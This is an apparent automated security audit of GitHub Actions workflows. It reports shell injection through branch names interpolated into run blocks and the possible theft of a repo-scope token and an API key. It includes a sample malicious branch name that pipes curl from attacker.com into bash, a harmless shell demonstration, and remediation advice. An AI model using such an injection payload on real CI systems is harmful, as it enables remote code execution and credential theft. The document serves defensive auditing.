orchestrate-multi-repo-sdks

Fail

Audited by Gen Agent Trust Hub on Feb 16, 2026

Risk Level: HIGH
Categories: COMMAND_EXECUTION, DATA_EXFILTRATION
Full Analysis
  • [COMMAND_EXECUTION] (HIGH): Shell command injection via untrusted GitHub metadata.
  • Ingestion points: github.event.pull_request.head.ref in reconcile-prs.yaml and inputs.feature_branch in sdk_generation.yaml.
  • Capability inventory: Execution of arbitrary shell commands via the GitHub Actions runner.
  • Details: The workflows interpolate untrusted branch names directly into run blocks using ${{ ... }} syntax. Because the expression is expanded into the script text before the shell parses it, a branch named "; curl http://attacker.com | bash; #" breaks out of the intended command and executes code within the CI environment.
  • [DATA_EXFILTRATION] (HIGH): Exposure of high-privilege secrets.
  • Evidence: GH_TOKEN: ${{ secrets.SDK_REPOS_PAT }} and SPEAKEASY_API_KEY: ${{ secrets.SPEAKEASY_API_KEY }}.
  • Details: The vulnerable jobs have access to powerful credentials, including a Personal Access Token with repo scope. An attacker exploiting the command injection can exfiltrate these tokens, leading to full compromise of the connected repositories.
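The following is an added example, not code from the audited workflows: a small shell model of the injection described above and of the standard hardening. Actions substitutes `${{ ... }}` into the `run:` script text before the shell sees it, which the `run_interpolated` function reproduces with `sh -c`; binding the value under `env:` and reading it as a quoted shell variable (`run_via_env`) keeps it as data. The branch name is constructed here, and a harmless `echo INJECTED` stands in for the `curl ... | bash` payload from the finding.

```shell
#!/bin/sh
# Added example; the step definitions below are hypothetical reconstructions
# of the pattern the audit describes, not copies of reconcile-prs.yaml or
# sdk_generation.yaml.
#
# Vulnerable step (expression expanded into the script text):
#   - run: git checkout "${{ github.event.pull_request.head.ref }}"
#
# Hardened step (value passed through the environment):
#   - env:
#       BRANCH: ${{ github.event.pull_request.head.ref }}
#     run: git checkout "$BRANCH"

# Constructed untrusted input, shaped like a PR head ref an attacker controls.
EVIL_REF='feature"; echo INJECTED; #'

# Models the vulnerable step: the ref is spliced into the command string first,
# then the whole string is parsed by a shell, so quotes in the ref end the
# argument and the rest runs as separate commands.
run_interpolated() {
    ref="$1"
    script="echo checking out \"$ref\""   # stands in for: git checkout "..."
    sh -c "$script"
}

# Models the hardened step: the script text is fixed; the ref only ever
# arrives as the value of $BRANCH and is expanded inside double quotes.
run_via_env() {
    BRANCH="$1" sh -c 'echo checking out "$BRANCH"'
}

# Demonstration when run directly: the first call prints a second line
# ("INJECTED"), the second prints the ref verbatim as a single argument.
if [ "${1:-}" = "--demo" ]; then
    run_interpolated "$EVIL_REF"
    run_via_env "$EVIL_REF"
fi
```

The env-variable form closes the injection for both ingestion points named in the finding (`github.event.pull_request.head.ref` and `inputs.feature_branch`); it does not reduce what a different foothold in the same job could do with `SDK_REPOS_PAT` or `SPEAKEASY_API_KEY`, which is the separate exposure tracked under DATA_EXFILTRATION.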
Recommendations
  • Do not expand github.event.pull_request.head.ref or inputs.feature_branch with ${{ ... }} inside run blocks; bind each value to a variable under env: and reference it in double quotes so the shell treats it as data rather than script text.
  • Limit SDK_REPOS_PAT and SPEAKEASY_API_KEY to the jobs and steps that need them, and prefer short-lived, narrowly scoped credentials over a long-lived PAT with repo scope.
Audit Metadata
  • Risk Level: HIGH
  • Analyzed: Feb 16, 2026, 03:07 AM